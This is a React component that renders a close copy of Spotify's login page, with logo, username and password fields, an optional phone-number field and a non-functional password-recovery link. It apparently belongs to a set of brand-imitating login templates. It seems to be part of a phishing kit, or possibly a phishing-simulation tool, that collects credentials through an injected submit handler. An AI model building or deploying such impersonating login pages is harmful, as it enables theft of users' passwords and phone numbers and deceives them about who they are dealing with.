
import React from 'react';
import { Button } from '@/components/ui/button';
import { Input } from '@/components/ui/input';
import { Label } from '@/components/ui/label';
import { Checkbox } from '@/components/ui/checkbox';
import { LoginTemplate } from '@/lib/loginTemplates/types';

interface SpotifyTemplateProps {
  template: LoginTemplate;
  username: string;
  setUsername: (value: string) => void;
  password: string;
  setPassword: (value: string) => void;
  phoneNumber: string;
  setPhoneNumber: (value: string) => void;
  handleSubmit: (e: React.FormEvent) => void;
  isLoading: boolean;
  showPhoneField: boolean;
  navigateToSignup: (id: string) => void;
}

const SpotifyTemplate: React.FC<SpotifyTemplateProps> = ({
  template,
  username,
  setUsername,
  password,
  setPassword,
  phoneNumber,
  setPhoneNumber,
  handleSubmit,
  isLoading,
  showPhoneField,
  navigateToSignup,
}) => {
  return (
    <div className="spotify-login w-full p-8 rounded-lg animate-scale-in bg-black">
      <div className="flex flex-col items-center mb-8">
        <img 
          src={template.logoUrl} 
          alt="Spotify" 
          className="spotify-logo"
        />
        <h2 className="text-2xl font-bold text-white my-6">Log in to continue</h2>
      </div>
      
      <form onSubmit={handleSubmit} className="space-y-4">
        <div className="space-y-2">
          <Label htmlFor="username" className="text-white text-sm font-bold">
            Email address or username
          </Label>
          <Input
            id="username"
            type="text"
            value={username}
            onChange={(e) => setUsername(e.target.value)}
            placeholder="Email address or username"
            className="spotify-input w-full"
            required
          />
        </div>
        
        <div className="space-y-2">
          <Label htmlFor="password" className="text-white text-sm font-bold">
            Password
          </Label>
          <Input
            id="password"
            type="password"
            value={password}
            onChange={(e) => setPassword(e.target.value)}
            placeholder="Password"
            className="spotify-input w-full"
            required
          />
        </div>
        
        {showPhoneField && (
          <div className="space-y-2">
            <Label htmlFor="phone" className="text-white text-sm font-bold">
              Phone Number
            </Label>
            <Input
              id="phone"
              type="tel"
              value={phoneNumber}
              onChange={(e) => setPhoneNumber(e.target.value)}
              placeholder="Enter your phone number"
              className="spotify-input w-full"
            />
          </div>
        )}
        
        <a href="#" className="spotify-forgot block text-center text-sm" onClick={(e) => e.preventDefault()}>
          Forgot your password?
        </a>
        
        <div className="flex items-center justify-between pt-2">
          <div className="flex items-center space-x-2">
            <Checkbox id="remember" />
            <label htmlFor="remember" className="text-white text-sm">Remember me</label>
          </div>
          
          <Button
            type="submit"
            className="spotify-btn"
            style={{ backgroundColor: "#1DB954" }}
            disabled={isLoading}
          >
            {isLoading ? 'LOGGING IN...' : 'LOG IN'}
          </Button>
        </div>
      </form>
      
      <div className="border-t border-gray-700 my-8"></div>
      
      <div className="text-center">
        <h3 className="font-bold text-white mb-6">Don't have an account?</h3>
        
        <Button 
          variant="outline"
          className="spotify-alt-btn w-full mb-4"
          onClick={() => navigateToSignup(template.id)}
        >
          SIGN UP FOR SPOTIFY
        </Button>
      </div>
    </div>
  );
};

export default SpotifyTemplate;